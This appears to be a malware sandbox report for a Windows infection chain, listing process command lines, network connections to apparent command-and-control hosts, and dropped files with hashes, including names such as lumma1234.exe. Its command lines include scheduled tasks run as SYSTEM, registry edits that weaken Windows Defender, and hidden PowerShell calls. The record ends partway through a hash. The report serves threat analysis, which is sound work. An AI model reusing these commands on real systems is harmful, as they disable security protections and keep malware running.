schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 19:37:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe\" 0c /qdotdidNb 385118 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe 0c /qdotdidNb 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5648 -ip 5648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 836

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WCXnYbS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\vNnVqYX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\sajTEfs.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\QTCNSRy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\RLRPNdC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 08:47:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll\",#1 /ROMbdidSQ 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "hhewb1" /SC once /ST 02:51:13 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "hhewb1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb09ff3cb8,0x7ffb09ff3cc8,0x7ffb09ff3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "hhewb1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5072 -ip 5072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 1000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3040 -ip 3040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 2096

Network

Country Destination Domain Proto
RU 147.45.47.155:80 147.45.47.155 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
DE 185.172.128.33:8970 tcp
RU 5.42.65.67:48396 tcp
RU 185.215.113.67:40960 tcp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 107.184.67.172.in-addr.arpa udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 172.67.174.208:443 patternapplauderw.shop tcp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 208.174.67.172.in-addr.arpa udp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
US 172.67.158.30:443 messtimetabledkolvk.shop tcp
DE 23.88.106.134:80 23.88.106.134 tcp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 104.21.79.77:443 yip.su tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
US 172.67.19.24:443 pastebin.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 free.360totalsecurity.com tcp
DE 185.172.128.82:80 185.172.128.82 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
GB 18.165.158.75:80 sd.p.360safe.com tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 172.67.75.163:443 api.myip.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 104.21.76.57:443 iplogger.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
MD 94.103.188.126:80 94.103.188.126 tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 104.21.76.57:443 iplogger.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 104.192.108.21:80 int.down.360safe.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
GB 172.217.169.3:443 ssl.gstatic.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
N/A 127.0.0.1:50927 tcp
N/A 127.0.0.1:50936 tcp
N/A 127.0.0.1:50942 tcp
N/A 127.0.0.1:50944 tcp
DE 195.10.205.90:4609 pepecasas123.net tcp
US 104.192.108.17:80 int.down.360safe.com tcp
DE 195.10.205.90:4609 pepecasas123.net tcp
NL 185.43.220.45:4383 cobusabobus.cam tcp
GB 142.250.179.238:443 play.google.com udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 54.210.117.250:443 service-domain.xyz tcp
GB 142.250.187.238:443 clients2.google.com tcp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 44.235.180.78:80 api3.check-data.xyz tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 44.235.180.78:443 api3.check-data.xyz tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
GB 172.217.169.3:443 ssl.gstatic.com tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
GB 142.250.179.238:443 play.google.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
GB 142.250.179.238:443 play.google.com udp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp

Files

memory/4748-0-0x00000000000E0000-0x0000000000588000-memory.dmp

memory/4748-1-0x00000000774D6000-0x00000000774D8000-memory.dmp

memory/4748-2-0x00000000000E1000-0x000000000010F000-memory.dmp

memory/4748-3-0x00000000000E0000-0x0000000000588000-memory.dmp

memory/4748-5-0x00000000000E0000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 d90dc86c07c652736ef253bda10ebdb7
SHA1 8f00555f5f07d01fa443b8cd192d526aea6657d2
SHA256 c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
SHA512 b5305f4153b972f4e82752fabfe40795154f7ec85a67d70d27839b47299020362a2ff51287c516895ef0690ca791ac1e6ac5e8c06ace34a71876a054aa23611a

memory/4748-17-0x00000000000E0000-0x0000000000588000-memory.dmp

memory/1152-18-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-19-0x00000000007E1000-0x000000000080F000-memory.dmp

memory/1152-20-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-21-0x00000000007E0000-0x0000000000C88000-memory.dmp

C:\Users\Admin\1000004002\7ec52fcc46.exe

MD5 e38381d97120484d6222043615517eb3
SHA1 26113dc47fd2a46de7133aeb1f4491ad0c2037e4
SHA256 1ea19d27a96fde8c92fade71c70d3c7dcb9a75d070d6d400d6eda8c2a5a6babe
SHA512 4f04bef4b67e0b270062147cac23b27480a9a625c0990527d5ac83b58330cf30925138d0ecb96cff4e76109d3c51324be55cf487e34dac467a9e9ebf059498fa

memory/3572-39-0x00000000003A0000-0x0000000000873000-memory.dmp

memory/3572-40-0x00000000003A0000-0x0000000000873000-memory.dmp

memory/3572-51-0x00000000003A0000-0x0000000000873000-memory.dmp

memory/4028-53-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/1152-54-0x00000000007E0000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

MD5 208bd37e8ead92ed1b933239fb3c7079
SHA1 941191eed14fce000cfedbae9acfcb8761eb3492
SHA256 e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512 a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715

memory/3716-70-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/4700-71-0x0000000000400000-0x0000000000592000-memory.dmp

memory/3716-72-0x00000000010E0000-0x00000000010E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe

MD5 b70e66520c92d2385c61d612bb45937e
SHA1 8beae042520d2c0c45ce70aa64ef06ea4cb8b5f0
SHA256 5a145443d06bc42c249f1cfee435f301bb7631218acf1543d84f76de0354249c
SHA512 733f501aa8f4ba446f41dd9e922d7b7e87e4f849160bcbf6d7ae86d848d938b43a1dbdafdf01a05377ffaa5c27bd9b2635e6fc032367ccc02efb99bef6106cfc

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

MD5 816df4ac8c796b73a28159a0b17369b6
SHA1 db8bbb6f73fab9875de4aaa489c03665d2611558
SHA256 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA512 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

MD5 15a7cae61788e4718d3c33abb7be6436
SHA1 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256 bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA512 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

memory/3016-104-0x0000000000CB0000-0x0000000000D02000-memory.dmp

memory/3016-105-0x0000000005B80000-0x0000000006126000-memory.dmp

memory/3016-106-0x00000000056B0000-0x0000000005742000-memory.dmp

memory/4692-109-0x0000000000150000-0x00000000001BC000-memory.dmp

memory/3016-108-0x0000000005690000-0x000000000569A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpC1F8.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/3016-124-0x0000000006230000-0x00000000062A6000-memory.dmp

memory/3016-125-0x00000000069B0000-0x00000000069CE000-memory.dmp

memory/3016-128-0x0000000007230000-0x0000000007848000-memory.dmp

memory/3016-130-0x0000000006CC0000-0x0000000006CD2000-memory.dmp

memory/3016-129-0x0000000006D80000-0x0000000006E8A000-memory.dmp

memory/3016-132-0x0000000006E90000-0x0000000006EDC000-memory.dmp

memory/3016-131-0x0000000006D20000-0x0000000006D5C000-memory.dmp

memory/4028-134-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/1152-135-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-133-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/4692-138-0x000000001D660000-0x000000001D69C000-memory.dmp

memory/4692-137-0x000000001D600000-0x000000001D612000-memory.dmp

memory/4692-136-0x000000001D710000-0x000000001D81A000-memory.dmp

memory/3016-139-0x0000000006FD0000-0x0000000007036000-memory.dmp

memory/3016-142-0x0000000007950000-0x00000000079A0000-memory.dmp

memory/4692-143-0x000000001DCA0000-0x000000001DD16000-memory.dmp

memory/4692-144-0x000000001B050000-0x000000001B06E000-memory.dmp

memory/916-153-0x0000000000330000-0x0000000000927000-memory.dmp

memory/4692-155-0x000000001EAF0000-0x000000001F018000-memory.dmp

memory/4692-154-0x000000001E3F0000-0x000000001E5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

memory/4236-174-0x0000000000A00000-0x0000000000A52000-memory.dmp

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 5fc2192691379dd3bd8bb437f5366bbf
SHA1 a93466745a01386c2bb2b5a77e52d8878666603c
SHA256 3e099ceb0dc4548cb473f74d22785b2ab92ac01e5a1cedf87e16413193c7d8b7
SHA512 f9df3193c348aa468e68f39e7a253df44df8c116a08ab933a09b350e416921f7c0f95baf400c3c32a447edc3aa7df9d629312a5ccfaa0ce29467a042b8eccffc

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 d43c5a9ab4089394f378c1076ba12d80
SHA1 cf05d839f147d2547a94fa5eb5bac7a22ba07e51
SHA256 1bc735de9b5a5883552defac59205c6d6618ada2bba5092b620a6eaea1bcfd87
SHA512 3c0fff8a2e18d6511f001431360af19b7197e871b49e5f8f058f95ee237ef0fc2839fd4269feaa26021fdbb00ee57bfd10ebc4b9674a15508a538ead4c10c952

memory/4028-193-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/1152-194-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-196-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-195-0x00000000007E0000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/1240-214-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

memory/2676-213-0x0000000000400000-0x0000000000455000-memory.dmp

memory/2676-215-0x0000000000400000-0x0000000000455000-memory.dmp

memory/916-218-0x0000000000330000-0x0000000000927000-memory.dmp

memory/4028-219-0x0000000000D70000-0x0000000001243000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/3548-237-0x0000000001A80000-0x0000000001A81000-memory.dmp

memory/3296-238-0x0000000000400000-0x0000000000459000-memory.dmp

memory/3296-236-0x0000000000400000-0x0000000000459000-memory.dmp

memory/4084-240-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/1576-243-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/1152-242-0x00000000007E0000-0x0000000000C88000-memory.dmp

memory/4084-245-0x0000000000D70000-0x0000000001243000-memory.dmp

memory/1576-247-0x00000000007E0000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

MD5 05b11e7b711b4aaa512029ffcb529b5a
SHA1 a8074cf8a13f21617632951e008cdfdace73bb83
